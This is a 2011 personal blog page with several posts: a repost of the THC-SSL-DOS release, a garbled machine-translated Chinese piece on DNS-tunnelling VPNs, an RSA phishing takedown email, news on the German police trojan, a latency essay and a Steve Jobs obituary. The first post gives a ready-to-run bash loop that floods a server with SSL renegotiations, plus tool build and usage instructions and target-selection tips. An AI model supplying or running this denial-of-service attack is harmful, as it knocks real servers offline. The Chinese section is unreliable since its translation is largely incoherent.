macbroadcast´s blog

Tool lets low-end PC crash much more powerful webserver
October 24, 2011, 6:40 pm
Filed under: Hacking, linux

SSL-DOS released. Some organizations already found out about this release a while ago and mistakenly identified it as an SSL-RENEGOTIATION BUG. This is not true. The tool can be modified to work without SSL-RENEGOTIATION by just establishing a new TCP connection for every new handshake.

2011-OCT-24: News Articles:


People are asking us about the private release that works against servers that do not support SSL renegotiation. We will not release it. Meanwhile the good news is that openssl can be used to perform the same attack It’s not as elegant as the private thc-ssl-dos but works quite well indeed. 2 simple commands in bash:

—–BASH SCRIPT BEGIN—– thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 2>/dev/null; done } for x in `seq 1 100`; do thc-ssl-dosit & done


THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection.

Download: Windows binary:

Unix Source : thc-ssl-dos-1.4.tar.gz

Use “./configure; make all install” to build.

Usage: ./thc-ssl-dos 443 Handshakes 0 [0.00 h/s], 0 Conn, 0 Err Secure Renegotiation support: yes Handshakes 0 [0.00 h/s], 97 Conn, 0 Err Handshakes 68 [67.39 h/s], 97 Conn, 0 Err Handshakes 148 [79.91 h/s], 97 Conn, 0 Err Handshakes 228 [80.32 h/s], 100 Conn, 0 Err Handshakes 308 [80.62 h/s], 100 Conn, 0 Err Handshakes 390 [81.10 h/s], 100 Conn, 0 Err Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack:

A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server. This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack. The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats 1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU. 2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used. 3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, … or the secure database port).

Counter measurements: No real solutions exists. The following steps can mitigate (but not solve) the problem: 1. Disable SSL-Renegotiation 2. Invest into SSL Accelerator Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this. Yours sincerely, The Hackers Choioce
October 23, 2011, 9:41 pm
Filed under: Big Brother, DNS, Hacking | Tags: , , ,

source in german

中国电信( CT )要防止VPN使用绕过认证和的签署过程的提供无线网络。 在一个全球网络安全中心(GCSC)中,指定名称和数字互联网公司(ICANN)和DNS操作,分析和研究中心(OARC)专家会议DNS生在罗马,刘资悭,一个在中国电信工程师,提出了他的“招数”的Loopc VPN中,对域名系统(DNS)隧道IP数据分析明显。

由来自南中国的报告是他一套,中国的网上购物门户网站提供淘宝流离失所意识到,报刘,谁开发,从市场领导者的无线网络。 Loopc VPN 为购房者提供其通过的中国电信和中国移动的热点不受限制的上网月租费。

对于概念在DNS IP是已知的超过10年,假定你有一个自己的域名以及其在互联网上运行(约 ​​服务器。 在客户端的概念作品,即使在一个孤立的网络中,当有一个DNS服务器,国外域名解析在互联网上。



在简单的实现是隐藏有关主机名称(如的问题。 如果从与局域网上的DNS服务器的完整服务器名称要求,将其缓存搜索第一。 因为他发现什么也没有,他开始请求和反复,直到通过适当的DNS服务器为tunnel.example.com谁回答他提供与它的方式。

然而,这些作品同时作为隧道端点:服务器解码从主机名称的实际要求获得这一信息,从互联网上的用户数据并将其发送回,为在DNS响应TXT记录的范例。 从客户端抓住他的手,并通过他们,如浏览器应用程序。 开源软件使用这种技术。

中国电信的分析场景的工程师可以解释如何Loopc VPN连接将通过提供网络隧道。 因此,使用该软件,上述过程。 此外,不同的软件,目标域和一个隧道端点的DNS服务器Loopc VPN工作在从Loopc VPN客户端的DNS错误,防止什么,似乎在DNS服务器缓存在中国电信的DNS查询,标志着他的回答到。

作为对策的中国电信工程师“后缀匹配/请求频率计数”(SM / RFC)使用方法:上明确要求及一些时间段可疑域的数量确定的过程,它超过一定值有查询。 百度大厂商如要排除白名单中。 要继续就是否中国电信在其他方法比对Loopc VPN技术措施的问题,刘资迁没有作出评论。 为VPN Loopc包目前在淘宝的网站仍然可用 。

什么是从工程的角度提出了为保护自己的基础设施“freeriders”是为那些谁想要在中国,像无监督和过滤的访问,不是一个好消息。 Loopc VPN杠杆显然提供者的过滤机制。是否也绕过了过滤器,分别对金长城防火墙屏蔽,目前还不清楚。 在Loopc问题的程度与对下一轮军备竞赛快速变化的领域去,刘回答说,为IP – OVER – DNS隧道绝对是稳定域夫妇是必要的。

此外,在会议本身已经提供的DNA专家,与意大利会议网络运营商的过滤做法战役:使他们不得不对DNA取样DNSSEC对他们的设备转用于记录访问WLAN认证页面必要的。此外,研讨会的许多与会者花了很多时间试图找到自己的VPN之间的许多阻塞端口的软件漏洞。 (莫妮卡Ermert)

odine lets you tunnel IPv4 data through a DNS server


New server , new luck…..
October 23, 2011, 3:21 am
Filed under: fraud, infografic, linux, phishing, society, Wordpress | Tags: , , , , , , ,

Since some folks try to hack my webserver and phishing facebook  accounts ( see left screenshot ,the php script is linked with image ) and  uploadet banking malware from the royal bank of canada and the citizenbank ( see screenshot below )via a wordpress vulnerability onto my webserver and i had several  hacking attempts , my server was used for a few outgoing  DDos attacks (see screenshots below ).

Subject: Fraudulent site, please shut down! [RBC 11217] IP: Domain:

Date: Fri, 1 Jul 2011 04:23:45 +0300

From: <>

Dear Sirs:

RSA , an anti-fraud and security company, is under contract to assist

Royal Bank of Canada and its related entities (“RBC”) – A leading

Canadian bank – in preventing or terminating online activity that

targets RBC’s clients as potential fraud victims.

RSA has been made aware that*you appear to be providing Internet

Services to a fraudulent Web site*, which is part of a “phishing scam”*.

This activity violatesRBC’s copyright, trademark and other intellectual

property rights and may violate the criminal laws ofCanada, the United

States and other nations.

E-mail messages have been broadly distributed to individuals by a person

or entity pretending to beRBC. These e-mails useRBC’s name and identity

(including trademarks) without authorization. The e-mails request

recipients to verify and submit sensitive details related to theirRBC


*Within the fraudulent e-mail message, there is a link that leads the

recipients to a fraudulent website displaying****RBC’s**copyrighted

materials and trademarks. The fraudulent website is located at the

following URL address


which you provide services and which is under your control.*

The fraudulent website not only represents a misuse ofRBC’s intellectual

property; its purpose is to improperly obtain personal information ofRBC

customers in order to fraudulently access their bank accounts. The

people behind those websites typically perpetrate identity-theft related

activities, such as using customer’s credit cards or bank accounts

without authorization. In addition, since the vast majority of all of

the e-mails are not being sent to actualRBC customers, the actions serve

to damage the reputation and image of RBC.

*Please take all necessary steps to immediately shut down the fraudulent

website, terminate its availability to the Internet and discontinue

the****transmission of any e-mails associated with this website.*

*We understand that you may not be aware of this improper use of your

services and we appreciate your cooperation. We specifically would ask

that you also take the following actions:*

• Please provide us with a tar/zip file of the source code for this

site, so that we may analyze it to help prevent further attacks.

• If any customer data has been captured that is stored on your systems

or equipment, please send us that data so that the customers to whom

that data relates can be notified and take steps to protect their credit.

• Please provide a copy of any records you maintain that indicate the

name, contact information, method of payment or similar information that

may be useful in helping learn the identity and location of the customer

for whom the website has been operated.

Thank you for your cooperation to prevent and terminate this fraudulent




RSA Anti Fraud Command Center

Tel: +44(0)800-032-7751 (UK)

Tel: +1-866-408-7525 (US)

Tel: + 1-800-406-8651 (CA)

Fax: +972-9-9728101 (EU)

Fax: +1-212-208-4644 (US)



For more information about RSA’s AFCC _



*cc:*Royal Bank of Canada

_Computer Security Incident Response Team_, RBC Information Security


Address: 315 Front St. W. – 13th Flr, Toronto, Ontario M5V 3A4

Tel: +1 – 416-348-4498

Fax: +1 – 416-348-2751

Email: _CSIRT@rbc.com_ <>


*”Phishing” is an e-mail scam that attempts to trick consumers into

revealing personal information, such as their credit or debit account

numbers, checking account information, Social Security Numbers, or

banking account passwords, through an imposter’s Web site or in a reply



NSA Chief: China Behind RSA Attacks

Chinese steal a “great deal” of military-related intellectual property, and were responsible for last year’s attacks on cybersecurity company RSA, Gen. Keith Alexander tells Senators.



Das Watergate der deutschen Medienpolitk – backdoor Trojan used by the German police force
October 9, 2011, 5:16 pm
Filed under: Big Brother, globalchange, Hacking, howto, socialweb, society | Tags:

via spiegelfechter und Netzpolitik english version via nakedsecurity

The famous Chaos Computer Club (CCC) has announced the discovery of a backdoor Trojan horse capable of spying on online activity and recording Skype internet calls which, it says, is used by the German police force.

The malware – which has been variously dubbed “0zapftis”, “Bundestrojaner” or “R2D2” – is likely to kick up a political storm, if the allegations are true.

Der Bundestrojaner kann nämlich wesentlich mehr. Zwar ist es richtig, dass er in seiner “Grundversion” nur den Vorgaben gehorcht. Nur, passend zu seiner Natur als Trojaner kann man ihn im Nachhinein beliebig aufrüsten, ohne jegliche Kontrolle. Über den installierten Trojaner können jederzeit weitere Dateien, ja ganze Programme auf den infizierten Rechner geladen werden.


                                                                                                      German government accused of spying on citizens with state-sponsored Trojan

Summary: A well-established group of German hackers has accused the German government of releasing a backdoor Trojan into the wild. Security firm F-Secure has confirmed that the program includes a keylogger and code that can take screenshots and record audio. more


Hackers from the Chaos Computer Club on Sunday said the German government’s controversial spy software contained dangerous security flaws while allowing potentially illegal activity. more

Er kann außerdem auf Mikrofon, Tastatur und andere Systeme des PCs zugreifen. Das heißt, dass letztlich der gesamte Rechner und seine Umgebung (über Mikrofon) dem Zugriff der Fahnder offensteht. Sie können sogar alle Passwörter von GMX-Account bis Onlinebanking auslesen, indem sie die Tastaturanschläge aufzeichnen; jede Verschlüsselung würde sinnlos. Sie können sich empfangene Mails zusenden und Dateien aufspielen, ganz nach Gutdünken. Denn der Trojaner enthält all diese Funktionen, entgegen – man muss es noch einmal sagen – den ausdrücklichen Vorgaben des BVerfG.

UPDATE via gulli : Mehrere Journalisten äußern mittlerweile die Vermutung, dass es sich bei der analysierten Software um den sogenannten “Bayerntrojaner” handelt. Blogger Markus Beckedahl vom Blog “netzpolitik” berichtet: “Es gibt einen ersten Spitzenkandidaten unter den Bundesländern bei der Suche, wer den Bundes- / Staatstrojaner illegal eingesetzt hat. Sowohl Erich Moechl bei FM4 als auch die Frankfurter Rundschau von Morgen tippen auf Bayern. […] Erich Moechl verweist auf Dokumente der Firma Digitask aus Hessen, die seit 2008 bei Wikileaks liegen. Digitask bietet die passende Software an, die alle Spezifikationen erfüllt, die der CCC entdeckt hat.” Den selben Verdacht äußert die Frankfurter Rundschau. Endgültige Beweise für die angenommene Urheberschaft des Trojaners stehen aber nach wie vor aus.

Lawblog more info at wikileaks.



Federal Trojan’s got a “Big Brother”

Beating the speed of light on the web
October 9, 2011, 10:31 am
Filed under: Decentralization, DNS, freedombox, globalchange, Hacking, howto, ipv6, linux | Tags: , ,

by Dave Täht

I started writing this piece this morning to talk about two things – bandwidth – which is pretty well understood – and latency, which is not – in the context of getting better performance out of humanity’s synergistic relationship with web based applications.
The problem is the speed of light!

“For a successful technology, reality must take precedence over public relations, for nature cannot be fooled.” 

                                                                     –Richard Feynman

Yesterday, I accidentally introduced a triangular routing situation on my network, which effectively put me on the moon, in time and space, relative to google. I was a good 3+ seconds away from their servers, where normally I’m about 70ms away.

It made clear the source of the latency problems I’d seen while travelling in Australia and in Nicaragua, where google’s servers (in 2008) were over 300ms and 170ms RTT, respectively.

Everybody outside the USA notices the KER… CHUNK of time they lose between a click to web access… and even in the USA this sort of latency is a problem.

Programmers try really, really hard to mask latency – web browsers spawn threads that do DNS lookups asynchronously, they make connections to multiple sites simultaneously, and they try to render as much of the page as possible as it is still streaming, and for all that, the best most web sites can do is deliver their content in a little over half a second, and most are adding additional layers of redirects and graphical gunk that make matters worse – and all they are doing, is trying to mask the latency that is unavoidable. Read more

1955 – 2011 R.I.P. Steve Jobs, Apple co-founder, dies at 56
October 8, 2011, 12:22 pm
Filed under: Uncategorized | Tags: , , ,

Jobs died at his home on October 5, 2011, due to complications from a rare form of pancreatic cancer.[136] Apple’s homepage from October 5, 2011 – present; Created in remembrance of Jobs shortly after he had died. Jobs’s death was announced by Apple in a statement which read: We are deeply saddened to announce that Steve Jobs passed away today. Steve’s brilliance, passion and energy were the source of countless innovations that enrich and improve all of our lives. The world is immeasurably better because of Steve. His greatest love was for his wife, Laurene, and his family. Our hearts go out to them and to all who were touched by his extraordinary gifts.”[137] source


Steve Jobs, Apple co-founder, dies at 56 source

Apple rememberign Steve jobs source

You know Dad, Steve Jobs was to our generation what Alexander Graham Bell and Thomas Edison were to previous generations.” source

Steve Jobs death: Google, Samsung delay product launches source

Funeral Held Friday for Apple Co-Founder Steve Jobs source

How Steve Jobs Changed the Story source